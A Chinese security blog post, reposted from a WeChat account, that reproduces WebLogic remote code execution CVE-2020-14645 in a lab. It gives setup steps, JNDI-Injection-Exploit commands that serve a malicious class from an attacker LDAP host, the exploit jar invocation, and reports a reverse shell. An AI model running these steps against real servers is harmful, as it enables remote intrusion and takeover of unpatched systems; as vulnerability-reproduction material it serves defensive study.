Weblogic远程代码执行漏洞(CVE-2020-14645)

admin 2020年12月9日21:59:33评论56 views字数 1520阅读5分4秒阅读模式

正文共: 1453 17

预计阅读时间:4分钟






简介



WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。

攻击者可利用漏洞实现远程代码执行。






影响版本


Oracle WebLogic Server 10.3.6.0.0

Oracle WebLogic Server 12.1.3.0.0

Oracle WebLogic Server 12.2.1.3.0

Oracle WebLogic Server 12.2.1.4.0

Oracle WebLogic Server 14.1.1.0.0






复现环境





下载JDK 6u211/7u201/8u191任意版本并配置环境变量

本人用的jdk8(下载地址:

https://mega.nz/file/1KIhjSCR#g0s5jekk3F9t55o3WXK_ahozuqn9_60eKSKt70we_uw

WebLogic 12.2.1.4官方下载地址:

https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html

安装

Weblogic远程代码执行漏洞(CVE-2020-14645)

一直点下一步,勾选自助启动配置向导选项

Weblogic远程代码执行漏洞(CVE-2020-14645)

进入配置向导,创建新域并勾选全部模板

Weblogic远程代码执行漏洞(CVE-2020-14645)

Weblogic远程代码执行漏洞(CVE-2020-14645)


安装成功后,使用cd跳到base_domain目录下

C:OracleMiddlewareOracle_Homeuser_projectsdomainsbase_domain

运行startWebLogic.cmd

Weblogic远程代码执行漏洞(CVE-2020-14645)

浏览器访问http://IP:7001/console/login/LoginForm.jsp

Weblogic远程代码执行漏洞(CVE-2020-14645)

使用JNDI工具搭建LDAP和HTTP服务,注意不能占用8180/1099/1389三个端口,修改要执行的命令后回车,会同时启动LDAP/RMI/HTTP三种服务,并且自动编译好带命令的class文件

JNDI工具下载地址:

https://github.com/welk1n/JNDI-Injection-Exploit

下载完成后进入目录编译

cd JNDI-Injection-Exploit

mvn clean package -DskipTests

Weblogic远程代码执行漏洞(CVE-2020-14645)

Weblogic远程代码执行漏洞(CVE-2020-14645)

编译的时间比较久,需要多等会(我在进行编译的时候,花了很久时间,是Maven源没更换导致的)

编译完成后进入target,使用命令

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C [command] -A [address]

Weblogic远程代码执行漏洞(CVE-2020-14645)

然后使用CVE-2020-14645漏洞验证工具

下载地址:https://github.com/DSO-Lab/defvul(推荐使用镜像地址:https://github.com.cnpmjs.org/DSO-Lab/defvul

进入CVE-2020-14645_Weblogic目录下进行编译

Weblogic远程代码执行漏洞(CVE-2020-14645)

因为我kali中的jdk版本为11,该漏洞验证工具需要的jdk版本为1.8;于是我又屁颠屁颠在ubuntu上装java,装mvn;开始编译

Weblogic远程代码执行漏洞(CVE-2020-14645)

编译成功:

Weblogic远程代码执行漏洞(CVE-2020-14645)

然后进入target

java -jar CVE-2020-14645.jar LDAP_IP:LDAP_PORT/#Exploit 

http://192.168.31.107:7001

Weblogic远程代码执行漏洞(CVE-2020-14645)

成功反弹

Weblogic远程代码执行漏洞(CVE-2020-14645)

Weblogic远程代码执行漏洞(CVE-2020-14645)




Weblogic远程代码执行漏洞(CVE-2020-14645)

END




扫描二维码

获取更多精彩

Weblogic远程代码执行漏洞(CVE-2020-14645)



本文始发于微信公众号(安全鸭):Weblogic远程代码执行漏洞(CVE-2020-14645)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年12月9日21:59:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Weblogic远程代码执行漏洞(CVE-2020-14645)http://cn-sec.com/archives/198775.html

发表评论

匿名网友 填写信息